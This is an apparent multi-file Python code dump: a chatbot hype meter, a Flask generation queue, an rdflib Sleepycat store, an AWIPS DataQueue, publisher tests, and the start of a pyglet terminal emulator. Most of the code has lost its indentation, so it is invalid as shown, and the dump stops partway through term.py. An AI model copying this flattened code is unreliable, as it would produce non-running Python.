hype_level = sum(EmoteLog)/(ScriptSettings.HypeLevelCount*1.0)*100
return hype_level
def ActivateReset():
global AwaitingReset
global OnCooldown
global CooldownStartTime
global EmoteLog
# Parent.Log("Hype Meter", "WE IN HERE")
# Wipe out the EmoteLog
EmoteLog = []
if ScriptSettings.CooldownSeconds:
OnCooldown = True
CooldownStartTime = time.time()
AwaitingReset = False
def ActivateMaximumHype():
global AwaitingReset
global AwaitingResetStartTime
# Do various things depending on what the user has configured
if ScriptSettings.SwitchSceneOnMaxHype:
# Only if the user has input a scene name do we attempt to switch the scene after configured delay
threading.Thread(target=SwitchSceneDelayTimer, args=(ScriptSettings.SwitchSceneOnMaxHype, ScriptSettings.SwitchSceneDelaySeconds)).start()
if ScriptSettings.EnableSourceOnMaxHype:
# Set scene target and call OBS Source Renderer after configured delay
threading.Thread(target=EnableSourceDelayTimer, args=(ScriptSettings.EnableSourceOnMaxHype, ScriptSettings.EnableSourceDelaySeconds, ScriptSettings.EnabledSourceSeconds)).start()
if ScriptSettings.ResetOnMaxHype:
AwaitingReset = True
AwaitingResetStartTime = time.time()
return
#---------------------------------------
# [Required] Initialize Data / Load Only
#---------------------------------------
def Init():
""" Initialize script or startup or reload. """
# Globals
global ScriptSettings
global EmoteLog
global LastLogBlockTime
global LastTickTime
global HypeReached
global AwaitingReset
global AwaitingResetStartTime
global OnCooldown
global CooldownStartTime
global MeterFreeze
# Load saved settings and validate values
ScriptSettings = Settings(SettingsFile)
EmoteLog = []
LastLogBlockTime = 0
LastTickTime = 0
HypeReached = False
AwaitingReset = False
AwaitingResetStartTime = 0
OnCooldown = False
CooldownStartTime = 0
MeterFreeze = False
return
# ---------------------------------------
# Chatbot Save Settings Function
# ---------------------------------------
def ReloadSettings(jsondata):
""" Set newly saved data from UI after user saved settings. """
# Globals
global ScriptSettings
# Reload saved settings and validate values
ScriptSettings.Reload(jsondata)
return
def Execute(data):
global MeterFreeze
# Check if we have a chat message
if data.IsChatMessage():
param_zero = data.GetParam(0).lower()
command_check = param_zero == "!freezehypemeter" or param_zero == "!unfreezehypemeter"
if command_check and Parent.HasPermission(data.User, ScriptSettings.CommandPermission, ""):
MeterFreeze = param_zero == "!freezehypemeter"
elif param_zero == "!maxhypemeter" and Parent.HasPermission(data.User, ScriptSettings.CommandPermission, ""):
            # If a mod wants to max out the meter then let's update it with however many are left to pass 100
UpdateEmoteLog(ScriptSettings.HypeLevelCount - sum(EmoteLog) + 1)
elif MeterFreeze == False:
if AwaitingReset or OnCooldown:
# Don't resume calculating things until we're off cooldown
return
# Count how many times the HypePhrases are found in the message
match_count = 0
for phrase in ScriptSettings.HypePhrases.split(','):
match_count += data.Message.count(phrase)
if match_count > 0:
if ScriptSettings.CountIndividualMatch == False:
# If we're counting multiple emotes in the same message as 1 then set to 1
match_count = 1
UpdateEmoteLog(match_count)
return
def Tick():
    # Declare globals up front so the assignments below update module state
    global OnCooldown
    global LastTickTime
    global HypeReached
    if AwaitingReset and time.time() - AwaitingResetStartTime >= ScriptSettings.ResetDelaySeconds:
        ActivateReset()
    if OnCooldown and time.time() - CooldownStartTime >= ScriptSettings.CooldownSeconds:
        OnCooldown = False
    # Every few seconds we'll broadcast the new HypeLevel
    if time.time() - LastTickTime >= ScriptSettings.TickTimeSeconds:
# Just in case no one is talking, let's send a zero to allow for decay
UpdateEmoteLog(0)
hype_level = CalculateHypeLevel()
if hype_level > 100 and ScriptSettings.ClipAtMaxHype:
hype_level = 100
SendHypeLevelWebsocket(hype_level)
if MeterFreeze == False:
if hype_level >= 100 and HypeReached == False:
HypeReached = True
ActivateMaximumHype()
if HypeReached == True and hype_level < 100:
HypeReached = False
LastTickTime = time.time()
return
# ---------------------------------------
# Script UI Button Functions
# ---------------------------------------
def OpenReadMe():
""" Open the script readme file in users default .txt application. """
os.startfile(ReadMeFile)
return
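# ---------------------------------------
# Rolling-Window Sketch (illustrative only)
# ---------------------------------------
# The hype level computed above is simply the sum of emote counts over the
# lookback window divided by HypeLevelCount, expressed as a percent. The two
# helpers below reproduce that math with plain lists so the decay behaviour can
# be tried outside the Chatbot; their names are assumptions for this sketch and
# they are never called by the script itself.
def _sketch_append_block(blocks, emote_count, lookback_minutes, block_length_seconds):
    """ Append a block and keep only the blocks inside the lookback window. """
    blocks.append(emote_count)
    lookback_length = (lookback_minutes * 60) // block_length_seconds
    return blocks[-lookback_length:]
def _sketch_hype_level(blocks, hype_level_count):
    """ Return the hype percentage for a list of per-block emote counts. """
    return sum(blocks) / (hype_level_count * 1.0) * 100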
|
app.py
|
from typing import Counter
from flask import Flask, request, jsonify
from model import McNLP
from flask_cors import CORS
import json
import threading, queue
app = Flask(__name__)
cors = CORS(app)
model = McNLP()
tasks = queue.Queue()
results = {}
class Task:
def __init__(self,client,string_to_start,temperature=1,max_length=200):
self.client = client
self.string_to_start = string_to_start
self.temperature = temperature
self.max_length = max_length
def generate(self, model):
return model.generate(self.string_to_start,self.temperature,self.max_length).replace('<s>','')
def worker():
while True:
item = tasks.get()
print(f'Working on {item.client} req')
res = item.generate(model)
results[item.client] = res
print(f'Finished {item.client} req')
tasks.task_done()
count = 0
@app.route('/generate', methods=['POST'])
def generate():
global count
# Retrieve the name from url parameter
print("got generate from:")
print(request.remote_addr)
string_to_start = request.json.get("string_to_start", None)
count += 1
try:
temperature = float(request.json.get("temperature"))
max_length = int(request.json.get("max_length"))
print(temperature)
print(max_length)
tasks.put(Task(count,string_to_start,temperature,max_length))
except Exception as identifier:
tasks.put(Task(count,string_to_start))
# For debugging
return json.dumps({'id':count}), 200
@app.route('/getres', methods=['GET'])
def get_result():
print("got get from:")
print(request.args.get('id'))
if int(request.args.get('id')) in results:
rap = results[int(request.args.get('id'))]
del results[int(request.args.get('id'))]
print("ready")
return json.dumps({'ready':True,'rap':rap}), 200
else:
print("not ready")
return json.dumps({'ready':False})
# Return the response in json format
threading.Thread(target=worker, daemon=True).start()
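# Minimal client sketch (an assumption for illustration, not part of the server
# code): it exercises the two endpoints above by submitting a generation task
# and then polling for the result. The host/port and the 'requests' dependency
# are assumptions; adjust to wherever this server actually runs.
def example_client(base_url='http://localhost:5000'):
    import requests
    import time as _time
    # Submit a task; the server replies with the task id to poll for
    resp = requests.post(base_url + '/generate',
                         json={'string_to_start': 'hello', 'temperature': 1.0, 'max_length': 50})
    task_id = resp.json()['id']
    # Poll /getres until the worker thread has produced a result
    while True:
        result = requests.get(base_url + '/getres', params={'id': task_id}).json()
        if result['ready']:
            return result['rap']
        _time.sleep(1)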
if __name__ == '__main__':
# Threaded option to enable multiple instances for multiple user access support
app.run(threaded=True, port=5000)
|
reigns.py
|
#!/usr/bin/python3
import argparse, multiprocessing, signal
from redis_worker import run as redis_run
from stats_worker import run as stats_run
from common import get_logger
DEFAULT_REDIS_WORKERS = 4
DEFAULT_STATS_INTERVAL = 3600
parser = argparse.ArgumentParser(description="run the stats and redis workers all from one place")
parser.add_argument("--redis-workers", default=DEFAULT_REDIS_WORKERS, type=int, help="number of redis workers to run")
parser.add_argument("--stats-interval", default=DEFAULT_STATS_INTERVAL, type=int, help="time to wait between collecting cached user stats")
args = parser.parse_args()
logger = get_logger(logger_name="ghpn-reigns")
logger.info("starting up!")
def r_worker():
redis_run()
return
# Main
logger.info("starting stats worker")
stats_run(args.stats_interval)
redis_jobs = []
def exiter(signal, frame):
for p in redis_jobs:
p.terminate()
logger.info("killed redis worker processes")
logger.info("ghpn-reigns has shutdown!")
exit(0)
logger.info("registering signal handler")
signal.signal(signal.SIGINT, exiter)
logger.info("starting %d redis worker processes" % (args.redis_workers))
for i in range(args.redis_workers):
p = multiprocessing.Process(target=r_worker)
redis_jobs.append(p)
p.start()
|
main.py
|
from tkinter import *
# from date_mangent import date
from date_mangent import DIR
from class_tools import Run
from check_box import Check_box
from check_box import List_box
from time import sleep
from calender import Time
import tkinter
# from ft_twint import Config_twint
from threading import Timer, Thread
from tkinter import font as tkFont
from MainView import MainView
font10="{Courier New} 10 normal"
font11 = "{U.S. 101} 30 bold"
font15 = "{Al-Aramco 11 bold}"
font16="{Segoe UI} 13 bold"
# fg= "steel blue" "#f2a343" "bg#d9d9d9" "#c60000"
# pyinstaller.exe --onefile -w --hiddenimport=babel.numbers
# pip3 install --user --upgrade git+https://github.com/twintproject/twint.git@origin/master#egg=twint
# pyinstaller --onefile --windowed --icon assets\zahlen_und_code.icn main.py
#
### pyinstaller --onefile --windowed part_manager.py
### pyinstaller --onefile --add-binary='/System/Library/Frameworks/Tk.framework/Tk':'tk' --add-binary='/System/Library/Frameworks/Tcl.framework/Tcl':'tcl' part_manager.py
####key___["Royal Air Maroc" , "@RAM_Maroc", "@RAM_Maroc", \
# "royalairmaroc", "الخطوط المغربيه" , "#الخطوط_الملكية_المغربية "\
# , "الخطوط الملكية المغربية" , "لارام", " لارام"\
# ,"الخطوط_الملكية_المغربية" ]
apps = MainView()
# def main():
# helv36 = tkFont.Font(family='Helvetica', size=36, weight=tkFont.BOLD)
# clander= Time(apps.container)
# clander.main()
# path = DIR(apps.container)
# path.main()
# box = Check_box(apps.container)
# box.main()
# arena = List_box(apps.container)
# arena.main()
# run=Run(apps.container,clander, path, box, arena)
# print("run")
# Thread(target=run.main).start()
# print("end _run")
# btn1 = Button(text='btn1', font=helv36)
# btn1.grid(row=0, column=0, columnspan=1, sticky='EWNS')
def app_init():
apps.title("extracting_tweets")
# apps.iconbitmap('./images/icon.ico')
# apps.iconphoto(True, PhotoImage(file='icon.ico'))
# img = PhotoImage(file='./icon.ico')
# root.tk.call('wm', 'iconphoto', root._w, img)
apps.geometry( '1200x790+0+0')#'950x530+0+0')#750x580+10+10 bg="#091833" 1200x590+0+0'
apps.configure(background="#091833")
if __name__ == "__main__":
app_init()
# main()
apps.mainloop()
|
sleepycat.py
|
from rdflib.store import Store, VALID_STORE, CORRUPTED_STORE, NO_STORE, UNKNOWN
from rdflib.term import URIRef
try:
from bsddb import db
except ImportError:
from bsddb3 import db
from os import mkdir
from os.path import exists, abspath
from urllib import pathname2url
from threading import Thread
import logging
_logger = logging.getLogger(__name__)
class Sleepycat(Store):
context_aware = True
formula_aware = True
transaction_aware = False
def __init__(self, configuration=None, identifier=None):
self.__open = False
self.__identifier = identifier
super(Sleepycat, self).__init__(configuration)
self.configuration = configuration
self._loads = self.node_pickler.loads
self._dumps = self.node_pickler.dumps
self.db_env = None
def __get_identifier(self):
return self.__identifier
identifier = property(__get_identifier)
def _init_db_environment(self, homeDir, create=True):
envsetflags = db.DB_CDB_ALLDB
envflags = db.DB_INIT_MPOOL | db.DB_INIT_CDB | db.DB_THREAD
if not exists(homeDir):
if create==True:
mkdir(homeDir) # TODO: implement create method and refactor this to it
self.create(homeDir)
else:
return NO_STORE
db_env = db.DBEnv()
db_env.set_cachesize(0, 1024*1024*50) # TODO
#db_env.set_lg_max(1024*1024)
db_env.set_flags(envsetflags, 1)
db_env.open(homeDir, envflags | db.DB_CREATE)
return db_env
def is_open(self):
return self.__open
def open(self, path, create=True):
homeDir = path
if self.__identifier is None:
self.__identifier = URIRef(pathname2url(abspath(homeDir)))
db_env = self._init_db_environment(homeDir, create)
if db_env == NO_STORE:
return NO_STORE
self.db_env = db_env
self.__open = True
dbname = None
dbtype = db.DB_BTREE
# auto-commit ensures that the open-call commits when transactions are enabled
dbopenflags = db.DB_THREAD
if self.transaction_aware == True:
dbopenflags |= db.DB_AUTO_COMMIT
dbmode = 0660
dbsetflags = 0
# create and open the DBs
self.__indicies = [None,] * 3
self.__indicies_info = [None,] * 3
for i in xrange(0, 3):
index_name = to_key_func(i)(("s", "p", "o"), "c")
index = db.DB(db_env)
index.set_flags(dbsetflags)
index.open(index_name, dbname, dbtype, dbopenflags|db.DB_CREATE, dbmode)
self.__indicies[i] = index
self.__indicies_info[i] = (index, to_key_func(i), from_key_func(i))
lookup = {}
for i in xrange(0, 8):
results = []
for start in xrange(0, 3):
score = 1
len = 0
for j in xrange(start, start+3):
if i & (1<<(j%3)):
score = score << 1
len += 1
else:
break
tie_break = 2-start
results.append(((score, tie_break), start, len))
results.sort()
score, start, len = results[-1]
def get_prefix_func(start, end):
def get_prefix(triple, context):
if context is None:
yield ""
else:
yield context
i = start
while i<end:
yield triple[i%3]
i += 1
yield ""
return get_prefix
lookup[i] = (self.__indicies[start], get_prefix_func(start, start + len), from_key_func(start), results_from_key_func(start, self._from_string))
self.__lookup_dict = lookup
self.__contexts = db.DB(db_env)
self.__contexts.set_flags(dbsetflags)
self.__contexts.open("contexts", dbname, dbtype, dbopenflags|db.DB_CREATE, dbmode)
self.__namespace = db.DB(db_env)
self.__namespace.set_flags(dbsetflags)
self.__namespace.open("namespace", dbname, dbtype, dbopenflags|db.DB_CREATE, dbmode)
self.__prefix = db.DB(db_env)
self.__prefix.set_flags(dbsetflags)
self.__prefix.open("prefix", dbname, dbtype, dbopenflags|db.DB_CREATE, dbmode)
self.__k2i = db.DB(db_env)
self.__k2i.set_flags(dbsetflags)
self.__k2i.open("k2i", dbname, db.DB_HASH, dbopenflags|db.DB_CREATE, dbmode)
self.__i2k = db.DB(db_env)
self.__i2k.set_flags(dbsetflags)
self.__i2k.open("i2k", dbname, db.DB_RECNO, dbopenflags|db.DB_CREATE, dbmode)
self.__needs_sync = False
t = Thread(target=self.__sync_run)
t.setDaemon(True)
t.start()
self.__sync_thread = t
return VALID_STORE
def __sync_run(self):
from time import sleep, time
try:
min_seconds, max_seconds = 10, 300
while self.__open:
if self.__needs_sync:
t0 = t1 = time()
self.__needs_sync = False
while self.__open:
sleep(.1)
if self.__needs_sync:
t1 = time()
self.__needs_sync = False
if time()-t1 > min_seconds or time()-t0 > max_seconds:
self.__needs_sync = False
_logger.debug("sync")
self.sync()
break
else:
sleep(1)
except Exception, e:
_logger.exception(e)
def sync(self):
if self.__open:
for i in self.__indicies:
i.sync()
self.__contexts.sync()
self.__namespace.sync()
self.__prefix.sync()
self.__i2k.sync()
self.__k2i.sync()
def close(self, commit_pending_transaction=False):
self.__open = False
self.__sync_thread.join()
for i in self.__indicies:
i.close()
self.__contexts.close()
self.__namespace.close()
self.__prefix.close()
self.__i2k.close()
self.__k2i.close()
self.db_env.close()
def add(self, (subject, predicate, object), context, quoted=False, txn=None):
"""\
Add a triple to the store of triples.
"""
assert self.__open, "The Store must be open."
assert context!=self, "Can not add triple directly to store"
Store.add(self, (subject, predicate, object), context, quoted)
_to_string = self._to_string
s = _to_string(subject, txn=txn)
p = _to_string(predicate, txn=txn)
o = _to_string(object, txn=txn)
c = _to_string(context, txn=txn)
cspo, cpos, cosp = self.__indicies
value = cspo.get("%s^%s^%s^%s^" % (c, s, p, o), txn=txn)
if value is None:
self.__contexts.put(c, "", txn=txn)
contexts_value = cspo.get("%s^%s^%s^%s^" % ("", s, p, o), txn=txn) or ""
contexts = set(contexts_value.split("^"))
contexts.add(c)
contexts_value = "^".join(contexts)
assert contexts_value!=None
cspo.put("%s^%s^%s^%s^" % (c, s, p, o), "", txn=txn)
cpos.put("%s^%s^%s^%s^" % (c, p, o, s), "", txn=txn)
cosp.put("%s^%s^%s^%s^" % (c, o, s, p), "", txn=txn)
if not quoted:
cspo.put("%s^%s^%s^%s^" % ("", s, p, o), contexts_value, txn=txn)
cpos.put("%s^%s^%s^%s^" % ("", p, o, s), contexts_value, txn=txn)
cosp.put("%s^%s^%s^%s^" % ("", o, s, p), contexts_value, txn=txn)
self.__needs_sync = True
def __remove(self, (s, p, o), c, quoted=False, txn=None):
cspo, cpos, cosp = self.__indicies
contexts_value = cspo.get("^".join(("", s, p, o, "")), txn=txn) or ""
contexts = set(contexts_value.split("^"))
contexts.discard(c)
contexts_value = "^".join(contexts)
for i, _to_key, _from_key in self.__indicies_info:
i.delete(_to_key((s, p, o), c), txn=txn)
if not quoted:
if contexts_value:
for i, _to_key, _from_key in self.__indicies_info:
i.put(_to_key((s, p, o), ""), contexts_value, txn=txn)
else:
for i, _to_key, _from_key in self.__indicies_info:
try:
i.delete(_to_key((s, p, o), ""), txn=txn)
except db.DBNotFoundError, e:
pass # TODO: is it okay to ignore these?
def remove(self, (subject, predicate, object), context, txn=None):
assert self.__open, "The Store must be open."
Store.remove(self, (subject, predicate, object), context)
_to_string = self._to_string
if context is not None:
if context == self:
context = None
if subject is not None and predicate is not None and object is not None and context is not None:
s = _to_string(subject, txn=txn)
p = _to_string(predicate, txn=txn)
o = _to_string(object, txn=txn)
c = _to_string(context, txn=txn)
value = self.__indicies[0].get("%s^%s^%s^%s^" % (c, s, p, o), txn=txn)
if value is not None:
self.__remove((s, p, o), c, txn=txn)
self.__needs_sync = True
else:
cspo, cpos, cosp = self.__indicies
index, prefix, from_key, results_from_key = self.__lookup((subject, predicate, object), context, txn=txn)
cursor = index.cursor(txn=txn)
try:
current = cursor.set_range(prefix)
needs_sync = True
except db.DBNotFoundError:
current = None
needs_sync = False
cursor.close()
while current:
key, value = current
cursor = index.cursor(txn=txn)
try:
cursor.set_range(key)
current = cursor.next()
except db.DBNotFoundError:
current = None
cursor.close()
if key.startswith(prefix):
c, s, p, o = from_key(key)
if context is None:
contexts_value = index.get(key, txn=txn) or ""
contexts = set(contexts_value.split("^")) # remove triple from all non quoted contexts
contexts.add("") # and from the conjunctive index
for c in contexts:
for i, _to_key, _ in self.__indicies_info:
i.delete(_to_key((s, p, o), c), txn=txn)
else:
self.__remove((s, p, o), c, txn=txn)
else:
break
if context is not None:
if subject is None and predicate is None and object is None:
# TODO: also if context becomes empty and not just on remove((None, None, None), c)
try:
self.__contexts.delete(_to_string(context, txn=txn), txn=txn)
except db.DBNotFoundError, e:
pass
self.__needs_sync = needs_sync
def triples(self, (subject, predicate, object), context=None, txn=None):
"""A generator over all the triples matching """
assert self.__open, "The Store must be open."
if context is not None:
if context == self:
context = None
_from_string = self._from_string
index, prefix, from_key, results_from_key = self.__lookup((subject, predicate, object), context, txn=txn)
cursor = index.cursor(txn=txn)
try:
current = cursor.set_range(prefix)
except db.DBNotFoundError:
current = None
cursor.close()
while current:
key, value = current
cursor = index.cursor(txn=txn)
try:
cursor.set_range(key)
current = cursor.next()
except db.DBNotFoundError:
current = None
cursor.close()
if key and key.startswith(prefix):
contexts_value = index.get(key, txn=txn)
yield results_from_key(key, subject, predicate, object, contexts_value)
else:
break
def __len__(self, context=None):
assert self.__open, "The Store must be open."
if context is not None:
if context == self:
context = None
if context is None:
prefix = "^"
else:
prefix = "%s^" % self._to_string(context)
index = self.__indicies[0]
cursor = index.cursor()
current = cursor.set_range(prefix)
count = 0
while current:
key, value = current
if key.startswith(prefix):
count +=1
current = cursor.next()
else:
break
cursor.close()
return count
def bind(self, prefix, namespace):
prefix = prefix.encode("utf-8")
namespace = namespace.encode("utf-8")
bound_prefix = self.__prefix.get(namespace)
if bound_prefix:
self.__namespace.delete(bound_prefix)
self.__prefix[namespace] = prefix
self.__namespace[prefix] = namespace
def namespace(self, prefix):
prefix = prefix.encode("utf-8")
return self.__namespace.get(prefix, None)
def prefix(self, namespace):
namespace = namespace.encode("utf-8")
return self.__prefix.get(namespace, None)
def namespaces(self):
cursor = self.__namespace.cursor()
results = []
current = cursor.first()
while current:
prefix, namespace = current
results.append((prefix, namespace))
current = cursor.next()
cursor.close()
for prefix, namespace in results:
yield prefix, URIRef(namespace)
def contexts(self, triple=None):
_from_string = self._from_string
_to_string = self._to_string
if triple:
s, p, o = triple
s = _to_string(s)
p = _to_string(p)
o = _to_string(o)
contexts = self.__indicies[0].get("%s^%s^%s^%s^" % ("", s, p, o))
if contexts:
for c in contexts.split("^"):
if c:
yield _from_string(c)
else:
index = self.__contexts
cursor = index.cursor()
current = cursor.first()
cursor.close()
while current:
key, value = current
context = _from_string(key)
yield context
cursor = index.cursor()
try:
cursor.set_range(key)
current = cursor.next()
except db.DBNotFoundError:
current = None
cursor.close()
def _from_string(self, i):
k = self.__i2k.get(int(i))
return self._loads(k)
def _to_string(self, term, txn=None):
k = self._dumps(term)
i = self.__k2i.get(k, txn=txn)
if i is None:
            # weird behavior from bsddb not taking a txn as a keyword argument
# for append
if self.transaction_aware:
i = "%s" % self.__i2k.append(k, txn)
else:
i = "%s" % self.__i2k.append(k)
self.__k2i.put(k, i, txn=txn)
return i
def __lookup(self, (subject, predicate, object), context, txn=None):
_to_string = self._to_string
if context is not None:
context = _to_string(context, txn=txn)
i = 0
if subject is not None:
i += 1
subject = _to_string(subject, txn=txn)
if predicate is not None:
i += 2
predicate = _to_string(predicate, txn=txn)
if object is not None:
i += 4
object = _to_string(object, txn=txn)
index, prefix_func, from_key, results_from_key = self.__lookup_dict[i]
prefix = "^".join(prefix_func((subject, predicate, object), context))
return index, prefix, from_key, results_from_key
def to_key_func(i):
def to_key(triple, context):
"Takes a string; returns key"
return "^".join((context, triple[i%3], triple[(i+1)%3], triple[(i+2)%3], "")) # "" to tac on the trailing ^
return to_key
def from_key_func(i):
def from_key(key):
"Takes a key; returns string"
parts = key.split("^")
return parts[0], parts[(3-i+0)%3+1], parts[(3-i+1)%3+1], parts[(3-i+2)%3+1]
return from_key
def results_from_key_func(i, from_string):
def from_key(key, subject, predicate, object, contexts_value):
"Takes a key and subject, predicate, object; returns tuple for yield"
parts = key.split("^")
if subject is None:
# TODO: i & 1: # dis assemble and/or measure to see which is faster
# subject is None or i & 1
s = from_string(parts[(3-i+0)%3+1])
else:
s = subject
if predicate is None:#i & 2:
p = from_string(parts[(3-i+1)%3+1])
else:
p = predicate
if object is None:#i & 4:
o = from_string(parts[(3-i+2)%3+1])
else:
o = object
return (s, p, o), (from_string(c) for c in contexts_value.split("^") if c)
return from_key
def readable_index(i):
s, p, o = "?" * 3
if i & 1: s = "s"
if i & 2: p = "p"
if i & 4: o = "o"
return "%s,%s,%s" % (s, p, o)
|
DataQueue.py
|
#
# Convenience class for using the DAF's notifications feature. This is a
# collection that, once connected to EDEX by calling start(), fills with
# data as notifications come in. Runs on a separate thread to allow
# non-blocking data retrieval.
#
#
#
# SOFTWARE HISTORY
#
# Date Ticket# Engineer Description
# ------------ ---------- ----------- --------------------------
# 07/29/16 2416 tgurney Initial creation
#
from awips.dataaccess import DataNotificationLayer as DNL
import time
from threading import Thread
import sys
if sys.version_info.major == 2:
from Queue import Queue, Empty
else: # Python 3 module renamed to 'queue'
from queue import Queue, Empty
"""Used to indicate a DataQueue that will produce geometry data."""
GEOMETRY = object()
"""Used to indicate a DataQueue that will produce grid data."""
GRID = object()
"""Default maximum queue size."""
_DEFAULT_MAXSIZE = 100
class Closed(Exception):
"""Raised when attempting to get data from a closed queue."""
pass
class DataQueue(object):
"""
Convenience class for using the DAF's notifications feature. This is a
collection that, once connected to EDEX by calling start(), fills with
data as notifications come in.
Example for getting obs data:
from DataQueue import DataQueue, GEOMETRY
request = DataAccessLayer.newDataRequest('obs')
request.setParameters('temperature')
request.setLocationNames('KOMA')
q = DataQueue(GEOMETRY, request)
q.start()
for item in q:
print(item.getNumber('temperature'))
"""
def __init__(self, dtype, request, maxsize=_DEFAULT_MAXSIZE):
"""
Create a new DataQueue.
Args:
dtype: Either GRID or GEOMETRY; must match the type of data
requested.
request: IDataRequest describing the data you want. It must at
least have datatype set. All data produced will satisfy the
constraints you specify.
maxsize: Maximum number of data objects the queue can hold at
one time. If the limit is reached, any data coming in after
that will not appear until one or more items are removed using
DataQueue.get().
"""
assert maxsize > 0
assert dtype in (GEOMETRY, GRID)
self._maxsize = maxsize
self._queue = Queue(maxsize=maxsize)
self._thread = None
if dtype is GEOMETRY:
self._notifier = DNL.getGeometryDataUpdates(request)
elif dtype is GRID:
self._notifier = DNL.getGridDataUpdates(request)
def start(self):
"""Start listening for notifications and requesting data."""
if self._thread is not None:
# Already started
return
kwargs = {'callback': self._data_received}
self._thread = Thread(target=self._notifier.subscribe, kwargs=kwargs)
self._thread.daemon = True
self._thread.start()
timer = 0
while not self._notifier.subscribed:
time.sleep(0.1)
timer += 1
if timer >= 100: # ten seconds
raise RuntimeError('timed out when attempting to subscribe')
def _data_received(self, data):
for d in data:
if not isinstance(d, list):
d = [d]
for item in d:
self._queue.put(item)
def get(self, block=True, timeout=None):
"""
Get and return the next available data object. By default, if there is
no data yet available, this method will not return until data becomes
available.
Args:
block: Specifies behavior when the queue is empty. If True, wait
until an item is available before returning (the default). If
False, return None immediately if the queue is empty.
timeout: If block is True, wait this many seconds, and return None
if data is not received in that time.
Returns:
IData
"""
if self.closed:
raise Closed
try:
return self._queue.get(block, timeout)
except Empty:
return None
def get_all(self):
"""
Get all data waiting for processing, in a single list. Always returns
immediately. Returns an empty list if no data has arrived yet.
Returns:
List of IData
"""
data = []
for _ in range(self._maxsize):
next_item = self.get(False)
if next_item is None:
break
data.append(next_item)
return data
def close(self):
"""Close the queue. May not be re-opened after closing."""
if not self.closed:
self._notifier.close()
self._thread.join()
def qsize(self):
"""Return number of items in the queue."""
return self._queue.qsize()
def empty(self):
"""Return True if the queue is empty."""
return self._queue.empty()
def full(self):
"""Return True if the queue is full."""
return self._queue.full()
@property
def closed(self):
"""True if the queue has been closed."""
return not self._notifier.subscribed
@property
def maxsize(self):
"""
Maximum number of data objects the queue can hold at one time.
If this limit is reached, any data coming in after that will not appear
until one or more items are removed using get().
"""
return self._maxsize
def __iter__(self):
if self._thread is not None:
while not self.closed:
yield self.get()
def __enter__(self):
self.start()
return self
def __exit__(self, *unused):
self.close()
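# Minimal usage sketch (assumes an EDEX server is reachable and that the 'obs'
# datatype, parameter and station below exist on it; adjust to your
# environment). It shows the context-manager form, which calls start() on entry
# and close() on exit, and drains whatever has arrived with get_all().
if __name__ == '__main__':
    from awips.dataaccess import DataAccessLayer
    request = DataAccessLayer.newDataRequest('obs')
    request.setParameters('temperature')
    request.setLocationNames('KOMA')
    with DataQueue(GEOMETRY, request) as q:
        for _ in range(10):
            for item in q.get_all():  # returns immediately, possibly an empty list
                print(item.getNumber('temperature'))
            time.sleep(5)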
|
test_publisher.py
|
import unittest
import time
from uphone.publisher import Publisher
from uphone.listener import Listener
from multiprocessing import Process
from multiprocessing import Array
def run_listener(data, n_messages):
client = Listener('0.0.0.0')
for i, message in zip(range(n_messages), client):
data[i] = int(message)
def slowed_range():
for i in range(10):
time.sleep(0.01)
yield str(i).zfill(3)
class TestPublisher(unittest.TestCase):
def setUp(self):
self.pub = Publisher()
def tearDown(self):
self.pub.close()
def build_listener(self, n_messages):
data = Array('d', [0.0]*n_messages)
client = Process(target=run_listener, args=(data, n_messages))
client.start()
return client, data
def test_sending(self):
self.pub._send_to_clients('abc')
def test_distributing_of_generator(self):
client, data = self.build_listener(5)
self.pub.send(gen=slowed_range, connection_interval=5)
client.join()
self.assertListEqual(
data[:], [5, 6, 7, 8, 9])
def test_multiple_check_for_connections(self):
client, data = self.build_listener(8)
self.pub.send(gen=slowed_range, connection_interval=2)
client.join()
self.assertListEqual(
data[:], [2, 3, 4, 5, 6, 7, 8, 9])
def test_client_failover(self):
# Build client that only fetches two messages
client, data = self.build_listener(2)
self.pub.send(gen=slowed_range, connection_interval=3)
client.join()
self.assertListEqual(
data[:], [3, 4])
def test_server_failover(self):
# TODO: Test if the server crashes
pass
def test_multiple_clients(self):
self.skipTest(
            'Somehow, this test does not work in the Docker instance spawned by Travis, '
            'but it does on pyboard and locally. Do we have deeper design problems somewhere?')
client_b, data_b = self.build_listener(5)
client_a, data_a = self.build_listener(2)
self.pub.send(gen=slowed_range, connection_interval=3)
for client in [client_a, client_b]:
client.terminate()
client.join()
self.assertListEqual(
data_a[:], [3.0, 4.0])
self.assertListEqual(
data_b[:], [3.0, 4.0, 5.0, 6.0, 7.0])
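# Added for convenience (an addition, not part of the original test module):
# allow running these tests directly with `python test_publisher.py` instead of
# only through an external test runner.
if __name__ == '__main__':
    unittest.main()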
|
term.py
|
SIZE = 10
HEIGHT = 40
WIDTH = 140
import time
import cProfile
import sys
import os
import pty
import fcntl
import termios
import struct
import threading
from collections import deque
from functools import partial
from weakref import WeakKeyDictionary
from pprint import pprint
import pyglet
from pyglet.window import key
def thread(fun):
def s(*args, **kwargs):
t = threading.Thread(target=lambda: fun(*args), **kwargs)
t.start()
return t
return s
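# Usage sketch for the decorator above (an illustration added to this listing;
# nothing else in term.py calls it by this name): calling a @thread-decorated
# function starts it on its own Thread and immediately returns the Thread
# object, so the caller can join() it later. Note that keyword arguments are
# passed to the Thread constructor (e.g. daemon=True), not to the wrapped
# function.
@thread
def _thread_demo(message):
    print(message)
# Example (not executed here): t = _thread_demo("hello"); t.join()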
symbols = {
key.BACKSPACE: "", key.UP: "OA",
key.DOWN: "OB", key.LEFT: "OD",
key.RIGHT: "OC", key.HOME: "OH",
key.END: "OF", key.PAGEUP: "[5~",
key.PAGEDOWN:"[6~",key.F1: "OP",
key.F2: "OQ", key.F3: "OR",
key.F4: "OS", key.F5: "OT",
key.F6: "OU", key.F7: "OV",
key.F8: "OW", key.F9: "OX",
key.F10: "OY", key.F11: "OZ",
key.F12: "[24~",key.ESCAPE: "",
key.TAB: "\t",
}
application_symbols = {
key.NUM_ENTER:"OM", key.NUM_1: "Op",
key.NUM_2: "Oq", key.NUM_3: "Or",
key.NUM_4: "Os", key.NUM_5: "Ot",
key.NUM_5: "Ou", key.NUM_6: "Ov",
key.NUM_7: "Ow", key.NUM_8: "Ox",
key.NUM_9: "Oy",
}
class DefAttr:
def __init__(self, default=lambda obj: None, **kwargs):
super().__init__(**kwargs)
self.default = default
def __get__(self, obj, type_=None):
try:
return super().__get__(obj, type_)
except KeyError:
return self.default(obj)
class Descriptor:
"""Allows a class to check before an attribute is retrieved,
or to update after it has been changed.
Also defaults
"""
def __init__(self, onset=lambda obj: None, onget=lambda obj, val:val, default=None):
self.onset = onset
self.onget = onget
self.vals = WeakKeyDictionary()
self.default = default
def __get__(self, obj, type_=None):
